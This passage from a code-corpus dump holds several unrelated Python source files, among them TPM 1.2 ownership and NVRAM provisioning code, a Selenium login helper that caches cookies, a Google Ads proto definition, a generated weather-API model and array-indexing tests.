enc_owner_auth,\n len(enc_srk_auth), enc_srk_auth,\n tpm_key12)\n # req needs authhandle, nonceodd & ownerAuth appended\n shainput = struct.unpack(\"%ds\" % (len(req) - 6), req[6:len(req)])[0]\n in_param_digest = sha1(shainput)\n\n continue_auth_session = 0\n in_auth_setup_params = struct.pack(\">20s20sB\", nonce_even, nonce_odd, continue_auth_session)\n macinput = struct.pack(\">20s %ds\" % len(in_auth_setup_params),\n in_param_digest, in_auth_setup_params)\n myhmac = hmac.HMAC(ownerpass_digest, hashes.SHA1(), backend=default_backend())\n myhmac.update(macinput)\n owner_auth = myhmac.finalize()\n\n req += struct.pack(fmt_auth, auth_handle, nonce_odd, continue_auth_session, owner_auth)\n\n _, ret = self.transfer(req, \"TPM_TakeOwnership\")\n return ret\n\n def ownerclear(self, ownerpass_digest):\n \"\"\" clear TPM ownership \"\"\"\n\n nonce_even, auth_handle, ret = self.oiap()\n if ret != 0:\n return 1\n\n nonce_odd = os.urandom(20)\n\n fmt_auth = \">I20sB20s\"\n fmt = \">H II\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_AUTH1_COMMAND,\n struct.calcsize(fmt) + struct.calcsize(fmt_auth), TPM_ORD_OWNER_CLEAR)\n\n shainput = struct.unpack(\"%ds\" % (len(req) - 6), req[6:len(req)])[0]\n in_param_digest = sha1(shainput)\n\n continue_auth_session = 0\n in_auth_setup_params = struct.pack(\">20s20sB\", nonce_even, nonce_odd, continue_auth_session)\n macinput = struct.pack(\">20s %ds\" % len(in_auth_setup_params),\n in_param_digest, in_auth_setup_params)\n myhmac = hmac.HMAC(ownerpass_digest, hashes.SHA1(), backend=default_backend())\n myhmac.update(macinput)\n owner_auth = myhmac.finalize()\n\n req += struct.pack(fmt_auth, auth_handle, nonce_odd, continue_auth_session, owner_auth)\n\n _, ret = self.transfer(req, \"TPM_ClearOwner\")\n return ret\n\n def nv_define_space(self, nvindex, nvindexattrs, size):\n \"\"\" Define an nvindex with the given permissions and size \"\"\"\n\n pcr_info_short = struct.pack(\">HBBB B 20s\",\n 3, 0, 0, 0,\n TPM_LOC_ALL,\n ('\\x00' * 20).encode())\n\n fmt = \">HI %ds%ds HI BBBI\" % (len(pcr_info_short), len(pcr_info_short))\n nv_data_public = struct.pack(fmt,\n TPM_TAG_NV_DATA_PUBLIC, nvindex,\n pcr_info_short, pcr_info_short,\n TPM_TAG_NV_ATTRIBUTES, nvindexattrs,\n 0, 0, 0, size)\n fmt = \">HII %ds 20s\" % len(nv_data_public)\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_NV_DEFINE_SPACE,\n nv_data_public,\n ('\\x00' * 20).encode())\n _, ret = self.transfer(req, \"TPM_NV_DefineSpace\")\n return ret\n\n def nv_write_value(self, nvindex, data):\n \"\"\" Write data to an index \"\"\"\n\n fmt = \">HII III%ds\" % len(data)\n req = 
struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_NV_WRITE_VALUE,\n nvindex, 0, len(data), data)\n _, ret = self.transfer(req, \"TPM_NV_WriteValue\")\n return ret\n\n def write_ek_cert_nvram(self, data):\n \"\"\" Write the EK Certificate into NVRAM \"\"\"\n\n nvindex = TPM_NV_INDEX_EKCERT|TPM_NV_INDEX_D_BIT\n ret = self.nv_define_space(nvindex, TPM_NV_PER_OWNERREAD|TPM_NV_PER_OWNERWRITE, len(data))\n if ret != 0:\n return 1\n\n ret = self.nv_write_value(nvindex, data)\n if ret != 0:\n return 1\n\n return 0\n\n def write_platform_cert_nvram(self, data):\n \"\"\" Write the Platform Certificate into NVRAM \"\"\"\n\n nvindex = TPM_NV_INDEX_PLATFORMCERT|TPM_NV_INDEX_D_BIT\n ret = self.nv_define_space(nvindex, TPM_NV_PER_OWNERREAD|TPM_NV_PER_OWNERWRITE, len(data))\n if ret != 0:\n return 1\n\n return self.nv_write_value(nvindex, data)\n\n def nv_lock(self):\n \"\"\" Lock the NVRAM \"\"\"\n\n return self.nv_define_space(TPM_NV_INDEX_LOCK, 0, 0)\n"} {"ext": "py", "sha": "1a3138de56d4b949e2c7c498e3ecc4e2e51a877d", "content": "import logging\n\nfrom spaceone.core.manager import BaseManager\nfrom spaceone.core.connector.space_connector import SpaceConnector\nfrom spaceone.core import cache\nfrom spaceone.cost_analysis.error import *\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass IdentityManager(BaseManager):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.identity_connector: SpaceConnector = self.locator.get_connector('SpaceConnector', service='identity')\n\n def list_projects(self, query, domain_id):\n return self.identity_connector.dispatch('Project.list', {'query': query, 'domain_id': domain_id})\n\n def get_project(self, project_id, domain_id):\n return self.identity_connector.dispatch('Project.get', {'project_id': project_id, 'domain_id': domain_id})\n\n def list_project_groups(self, query, domain_id):\n return self.identity_connector.dispatch('ProjectGroup.list', {'query': query, 'domain_id': domain_id})\n\n def get_project_group(self, project_group_id, domain_id):\n return self.identity_connector.dispatch('ProjectGroup.get', {'project_group_id': project_group_id,\n 'domain_id': domain_id})\n\n def list_projects_in_project_group(self, project_group_id, domain_id, recursive=False, query=None):\n request = {\n 'project_group_id': project_group_id,\n 'domain_id': domain_id,\n 'recursive': recursive\n }\n\n if query:\n request['query'] = query\n\n return self.identity_connector.dispatch('ProjectGroup.list_projects', request)\n\n def get_service_account(self, service_account_id, domain_id):\n return self.identity_connector.dispatch('ServiceAccount.get', {'service_account_id': service_account_id,\n 'domain_id': domain_id})\n\n def list_service_accounts(self, query, domain_id):\n return self.identity_connector.dispatch('ServiceAccount.list', {'query': query, 'domain_id': domain_id})\n"} {"ext": "py", "sha": "1a31390df8157aa287258bfabdd4571c504538bf", "content": "# -*- coding: utf-8 -*-\n# @Time : 2019-02-25 09:53\n# @Author : EchoShoot\n# @Email : BiarFordlander@gmail.com\n# @URL : https://github.com/EchoShoot\n# @File : Login.py\n# @Explain : 整合登录逻辑\n\nimport logging\nimport shelve\nimport time\nfrom selenium import webdriver\nfrom SmartLogin import finder\nfrom SmartLogin import monitor\nfrom SmartLogin import Errors\n\nlogger = logging.getLogger(__name__)\n\n\n# logger.disabled = True\n\nclass Login(object):\n def __init__(self, login_url, target_page, driver=None):\n self.login_page = login_url # 登录地址\n self.target_page = target_page # 
目标地址\n self.cookie_db = shelve.open('Cookie', writeback=True) # 存储Cookie\n self.driver = driver\n if self.driver is None:\n from pkg_resources import resource_filename, Requirement\n driverpath = resource_filename(Requirement.parse('SmartLogin'), 'SmartLogin/resource/chromedriver')\n logger.info(\"use default chrome driver from path: {}\".format(driverpath))\n self.driver = webdriver.Chrome(driverpath)\n\n def auto_login(self, username, password, click_xpath=None, update=False):\n \"\"\" 自动登录到页面, 如果页面存在登录记录, 则跳过登录过程. \"\"\"\n cookies = self.cookie_db.get(self.login_page, None) # 提取 cookie\n if update or cookies is None: # 如果 cookie 不存在\n cookies = self.login(username, password, click_xpath) # 模拟登录来获取 cookie\n self.cookie_db[self.login_page] = cookies # 存入 cookie\n else:\n # 一定是先访问网页,才能添加 Cookie 不报错\n self.driver.get(self.target_page)\n self.driver.delete_all_cookies() # 清空 Cookie 排除干扰\n for cookie in cookies:\n cookie.pop('expiry', None) # 弹出过期时间,让所有 Cookie 不会过期\n self.driver.add_cookie(cookie)\n self.driver.refresh() # 刷新使得 Cookie 效果生效\n return cookies\n\n def login(self, username, password, click_xpath=None):\n \"\"\" 自动切换到登录框, 输入账号密码 \"\"\"\n try:\n finder.smart_get(self.driver, self.login_page, 30) # 限制跳转到某个网页的加载时间\n finder.auto_switch_to_LoginForm(self.driver) # 自动切换到有密码输入框的地方\n if click_xpath: # 有些网页需要点击一下才会切换到密码输入框\n self.driver.find_element_by_xpath(click_xpath).click()\n finder.fill_username_and_password(self.driver, username, password) # 输入账号密码\n monitor.until_login_page_switch(self.driver) # 等待页面发生跳转\n cookies = self.driver.get_cookies() # 获取 Cookie 的操作\n except Errors.NoSuchWindowException as e:\n raise Errors.BrowsersMayClosed(\"浏览器可能被关闭了.\") from e\n else:\n return cookies\n\n def close(self):\n self.cookie_db.close()\n self.driver.quit()\n\n\nif __name__ == '__main__':\n login = Login(\n target_page='https://i.qq.com',\n login_url='https://i.qq.com',\n )\n cookie = login.auto_login('username', 'password',\n click_xpath='//a[@id=\"switcher_plogin\"]', # 若登录前不需要点击某处可以赋值为None\n update=True)\n print('拦截到 Cookie: {}'.format(cookie))\n time.sleep(4) # 延迟4秒便于观察"} {"ext": "py", "sha": "1a313918b965ac86982ab93c6537411317e9b272", "content": "# from test import test\nfrom senti19.senti19.test import test_name\n\n# test.test_name()\n\n# Tests().test_print_name()"} {"ext": "py", "sha": "1a313aa0e9949cfc731f21228a3dabd743eebfd9", "content": "# -*- coding: utf-8 -*-\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport proto # type: ignore\n\nfrom google.ads.googleads.v8.resources.types import payments_account\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v8.services\",\n marshal=\"google.ads.googleads.v8\",\n manifest={\"ListPaymentsAccountsRequest\", \"ListPaymentsAccountsResponse\",},\n)\n\n\nclass ListPaymentsAccountsRequest(proto.Message):\n r\"\"\"Request message for fetching all accessible payments\n accounts.\n\n Attributes:\n customer_id (str):\n Required. 
The ID of the customer to apply the\n PaymentsAccount list operation to.\n \"\"\"\n\n customer_id = proto.Field(proto.STRING, number=1,)\n\n\nclass ListPaymentsAccountsResponse(proto.Message):\n r\"\"\"Response message for\n [PaymentsAccountService.ListPaymentsAccounts][google.ads.googleads.v8.services.PaymentsAccountService.ListPaymentsAccounts].\n\n Attributes:\n payments_accounts (Sequence[google.ads.googleads.v8.resources.types.PaymentsAccount]):\n The list of accessible payments accounts.\n \"\"\"\n\n payments_accounts = proto.RepeatedField(\n proto.MESSAGE, number=1, message=payments_account.PaymentsAccount,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n"} {"ext": "py", "sha": "1a313ac2eaaccddc98520dc5be17257f4fbe712c", "content": "\"\"\"This is used to patch the QApplication style sheet.\nIt reads the current stylesheet, appends our modifications and sets the new stylesheet.\n\"\"\"\n\nfrom PyQt5 import QtWidgets\n\n\ndef patch_qt_stylesheet(use_dark_theme: bool) -> None:\n if not use_dark_theme:\n return\n\n app = QtWidgets.QApplication.instance()\n\n style_sheet = app.styleSheet()\n style_sheet = style_sheet + '''\n /* PayToEdit text was being clipped */\n QAbstractScrollArea {\n padding: 0px;\n }\n /* In History tab, labels while edited were being clipped (Windows) */\n QAbstractItemView QLineEdit {\n padding: 0px;\n }\n '''\n app.setStyleSheet(style_sheet)\n"} {"ext": "py", "sha": "1a313c2bf66324aaa926e2f79e23257b013f52ea", "content": "\"\"\"\n Deutscher Wetterdienst: API\n\n Aktuelle Wetterdaten von allen Deutschen Wetterstationen # noqa: E501\n\n The version of the OpenAPI document: 1.0.0\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom deutschland.dwd.exceptions import ApiAttributeError\nfrom deutschland.dwd.model_utils import ApiTypeError # noqa: F401\nfrom deutschland.dwd.model_utils import (\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n)\n\nfrom ..model_utils import OpenApiModel\n\n\nclass StationOverview10865Forecast2(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). 
The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n @cached_property\n def additional_properties_type():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n \"\"\"\n return (\n bool,\n date,\n datetime,\n dict,\n float,\n int,\n list,\n str,\n none_type,\n ) # noqa: E501\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n \"station_id\": (str,), # noqa: E501\n \"start\": (int,), # noqa: E501\n \"time_step\": (int,), # noqa: E501\n \"temperature\": ([float],), # noqa: E501\n \"temperature_std\": ([float],), # noqa: E501\n \"wind_speed\": (\n str,\n none_type,\n ), # noqa: E501\n \"wind_direction\": (\n str,\n none_type,\n ), # noqa: E501\n \"wind_gust\": (\n str,\n none_type,\n ), # noqa: E501\n \"icon\": ([int],), # noqa: E501\n \"precipitation_total\": ([int],), # noqa: E501\n \"precipitation_probablity\": (\n str,\n none_type,\n ), # noqa: E501\n \"precipitation_probablity_index\": (\n str,\n none_type,\n ), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n attribute_map = {\n \"station_id\": \"stationId\", # noqa: E501\n \"start\": \"start\", # noqa: E501\n \"time_step\": \"timeStep\", # noqa: E501\n \"temperature\": \"temperature\", # noqa: E501\n \"temperature_std\": \"temperatureStd\", # noqa: E501\n \"wind_speed\": \"windSpeed\", # noqa: E501\n \"wind_direction\": \"windDirection\", # noqa: E501\n \"wind_gust\": \"windGust\", # noqa: E501\n \"icon\": \"icon\", # noqa: E501\n \"precipitation_total\": \"precipitationTotal\", # noqa: E501\n \"precipitation_probablity\": \"precipitationProbablity\", # noqa: E501\n \"precipitation_probablity_index\": \"precipitationProbablityIndex\", # noqa: E501\n }\n\n read_only_vars = {}\n\n _composed_schemas = {}\n\n @classmethod\n @convert_js_args_to_python_args\n def _from_openapi_data(cls, *args, **kwargs): # noqa: E501\n \"\"\"StationOverview10865Forecast2 - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. 
snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n station_id (str): [optional] # noqa: E501\n start (int): [optional] # noqa: E501\n time_step (int): [optional] # noqa: E501\n temperature ([float]): [optional] # noqa: E501\n temperature_std ([float]): [optional] # noqa: E501\n wind_speed (str, none_type): [optional] # noqa: E501\n wind_direction (str, none_type): [optional] # noqa: E501\n wind_gust (str, none_type): [optional] # noqa: E501\n icon ([int]): [optional] # noqa: E501\n precipitation_total ([int]): [optional] # noqa: E501\n precipitation_probablity (str, none_type): [optional] # noqa: E501\n precipitation_probablity_index (str, none_type): [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop(\"_check_type\", True)\n _spec_property_naming = kwargs.pop(\"_spec_property_naming\", False)\n _path_to_item = kwargs.pop(\"_path_to_item\", ())\n _configuration = kwargs.pop(\"_configuration\", None)\n _visited_composed_classes = kwargs.pop(\"_visited_composed_classes\", ())\n\n self = super(OpenApiModel, cls).__new__(cls)\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. 
Remove those invalid positional arguments.\"\n % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n return self\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_spec_property_naming\",\n \"_path_to_item\",\n \"_configuration\",\n \"_visited_composed_classes\",\n ]\n )\n\n @convert_js_args_to_python_args\n def __init__(self, *args, **kwargs): # noqa: E501\n \"\"\"StationOverview10865Forecast2 - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n station_id (str): [optional] # noqa: E501\n start (int): [optional] # noqa: E501\n time_step (int): [optional] # noqa: E501\n temperature ([float]): [optional] # noqa: E501\n temperature_std ([float]): [optional] # noqa: E501\n wind_speed (str, none_type): [optional] # noqa: E501\n wind_direction (str, none_type): [optional] # noqa: E501\n wind_gust (str, none_type): [optional] # noqa: E501\n icon ([int]): [optional] # noqa: E501\n precipitation_total ([int]): [optional] # noqa: E501\n precipitation_probablity (str, none_type): [optional] # noqa: E501\n precipitation_probablity_index (str, none_type): [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop(\"_check_type\", True)\n _spec_property_naming = kwargs.pop(\"_spec_property_naming\", False)\n _path_to_item = kwargs.pop(\"_path_to_item\", ())\n _configuration = kwargs.pop(\"_configuration\", None)\n _visited_composed_classes = kwargs.pop(\"_visited_composed_classes\", ())\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. 
Remove those invalid positional arguments.\"\n % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n if var_name in self.read_only_vars:\n raise ApiAttributeError(\n f\"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate \"\n f\"class with read only attributes.\"\n )\n"} {"ext": "py", "sha": "1a313ca05b5deda64a1cca510515f2bd994f226c", "content": "import unittest\n\nfrom clpy import testing\n\n\n@testing.parameterize(\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (1, 0, 2)},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (-1, 0, -2)},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': (1, 0, 2)},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': (-1, 0, -2)},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None), slice(None, 1), slice(2))},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None), slice(None, -1), slice(-2))},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1),\n 'indexes': (slice(None), slice(None, 1), slice(2))},\n {'shape': (2, 3, 5), 'transpose': None,\n 'indexes': (slice(None, None, -1), slice(1, None, -1), slice(4, 1, -2))},\n {'shape': (2, 3, 5), 'transpose': (2, 0, 1),\n 'indexes': (slice(4, 1, -2), slice(None, None, -1), slice(1, None, -1))},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (Ellipsis, 2)},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (1, Ellipsis)},\n {'shape': (2, 3, 4, 5), 'transpose': None, 'indexes': (1, Ellipsis, 3)},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (1, None, slice(2), None, 2)},\n {'shape': (2, 3), 'transpose': None, 'indexes': (None,)},\n {'shape': (2,), 'transpose': None, 'indexes': (slice(None,), None)},\n {'shape': (), 'transpose': None, 'indexes': (None,)},\n {'shape': (), 'transpose': None, 'indexes': (None, None)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(10, -9, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-9, -10, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -10, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -11, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-11, -11, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(10, -9, -3),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -11, -3),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(1, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(0, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-4, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-6, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-10, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-11, -5, -1),)},\n {'shape': (10,), 'transpose': 
None, 'indexes': (slice(-12, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, 1, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, 0, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -1, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -4, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -6, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -10, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -11, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -12, -1),)},\n # reversing indexing on empty dimension\n {'shape': (0,), 'transpose': None, 'indexes': (slice(None, None, -1),)},\n {'shape': (0, 0), 'transpose': None,\n 'indexes': (slice(None, None, -1), slice(None, None, -1))},\n {'shape': (0, 0), 'transpose': None,\n 'indexes': (None, slice(None, None, -1))},\n {'shape': (0, 0), 'transpose': None,\n 'indexes': (slice(None, None, -1), None)},\n {'shape': (0, 1), 'transpose': None,\n 'indexes': (slice(None, None, -1), None)},\n {'shape': (1, 0), 'transpose': None,\n 'indexes': (None, slice(None, None, -1))},\n {'shape': (1, 0, 1), 'transpose': None,\n 'indexes': (None, slice(None, None, -1), None)},\n #\n {'shape': (2, 0), 'transpose': None,\n 'indexes': (1, slice(None, None, None))},\n)\n@testing.gpu\nclass TestArrayIndexingParameterized(unittest.TestCase):\n\n _multiprocess_can_split_ = True\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_getitem(self, xp, dtype):\n a = testing.shaped_arange(self.shape, xp, dtype)\n if self.transpose:\n a = a.transpose(self.transpose)\n return a[self.indexes]\n\n\n@testing.parameterize(\n {'shape': (), 'transpose': None, 'indexes': 0},\n {'shape': (), 'transpose': None, 'indexes': (slice(0, 1, 0),)},\n {'shape': (2, 3), 'transpose': None, 'indexes': (0, 0, 0)},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': -3},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': -5},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': 3},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': 5},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(0, 1, 0), )},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice((0, 0), None, None), )},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None, (0, 0), None), )},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None, None, (0, 0)), )},\n)\n@testing.with_requires('numpy>=1.12.0')\n@testing.gpu\nclass TestArrayInvalidIndex(unittest.TestCase):\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_raises()\n def test_invalid_getitem(self, xp, dtype):\n a = testing.shaped_arange(self.shape, xp, dtype)\n if self.transpose:\n a = a.transpose(self.transpose)\n a[self.indexes]\n\n\n@testing.gpu\nclass TestArrayIndex(unittest.TestCase):\n\n _multiprocess_can_split_ = True\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_constant(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n a[:] = 1\n return a\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_partial_constant(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n a[1, 1:3] = 1\n return a\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_copy(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n b = testing.shaped_arange((2, 3, 4), xp, dtype)\n a[:] = b\n 
return a\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_setitem_partial_copy(self, xp, dtype):\n a = xp.zeros((2, 3, 4), dtype=dtype)\n b = testing.shaped_arange((3, 2), xp, dtype)\n a[1, ::-1, 1:4:2] = b\n return a\n\n @testing.numpy_clpy_array_equal()\n def test_T(self, xp):\n a = testing.shaped_arange((2, 3, 4), xp)\n return a.T\n\n @testing.numpy_clpy_array_equal()\n def test_T_vector(self, xp):\n a = testing.shaped_arange((4,), xp)\n return a.T\n"} {"ext": "py", "sha": "1a313cea86a931fe57a3cc2a2237e526ec797163", "content": "# app\nfrom ..constants import FORMATS, LOG_FORMATTERS, LOG_LEVELS, REPOSITORIES, STRATEGIES, VERSION_SCHEMES\n\n\nenv_help = (\n 'Pipenv has 2 envs in same file: main and dev. '\n 'For poetry you can also use main-opt and dev-opt '\n 'that indicates to install optional requirements '\n 'from given env.'\n)\n\n\ndef build_config(parser):\n config_group = parser.add_argument_group('Configuration file')\n config_group.add_argument('-c', '--config', help='path to config file.')\n config_group.add_argument('-e', '--env', default='main', help='environment in config.')\n\n\ndef build_from(parser):\n from_group = parser.add_argument_group('Input file')\n from_group.add_argument('--from', help='path or format for reading requirements.')\n from_group.add_argument('--from-format', choices=FORMATS, help='format for reading requirements.')\n from_group.add_argument('--from-path', help='path to input file.')\n\n\ndef build_to(parser):\n to_group = parser.add_argument_group('Output file')\n to_group.add_argument('--to', help='path or format for writing requirements.')\n to_group.add_argument('--to-format', choices=FORMATS, help='output requirements file format.')\n to_group.add_argument('--to-path', help='path to output file.')\n\n\ndef build_resolver(parser):\n resolver_group = parser.add_argument_group('Resolver rules')\n resolver_group.add_argument('--strategy', choices=STRATEGIES, help='Algorithm to select best release.')\n resolver_group.add_argument('--prereleases', action='store_true', help='Allow prereleases')\n resolver_group.add_argument('--mutations', type=int, help='Maximum mutations limit')\n\n\ndef build_api(parser):\n api_group = parser.add_argument_group('APIs endpoints')\n api_group.add_argument('--warehouse', help='warehouse API URL.')\n api_group.add_argument('--bitbucket', help='bitbucket API URL.')\n api_group.add_argument('--repo', choices=REPOSITORIES, help='force repository for first-level deps.')\n\n\ndef build_output(parser):\n output_group = parser.add_argument_group('Console output')\n output_group.add_argument('--format', choices=LOG_FORMATTERS, help='output format.')\n output_group.add_argument('--level', choices=LOG_LEVELS, help='minimal level for log messages.')\n\n output_group.add_argument('--nocolors', action='store_true', help='do not color output.')\n output_group.add_argument('--silent', action='store_true', help='suppress any output except errors.')\n output_group.add_argument('--traceback', action='store_true', help='show traceback for exceptions.')\n output_group.add_argument('--filter', help='filter for JSON output.')\n\n\ndef build_venv(parser):\n venv_group = parser.add_argument_group('Virtual environment')\n venv_group.add_argument('--venv', 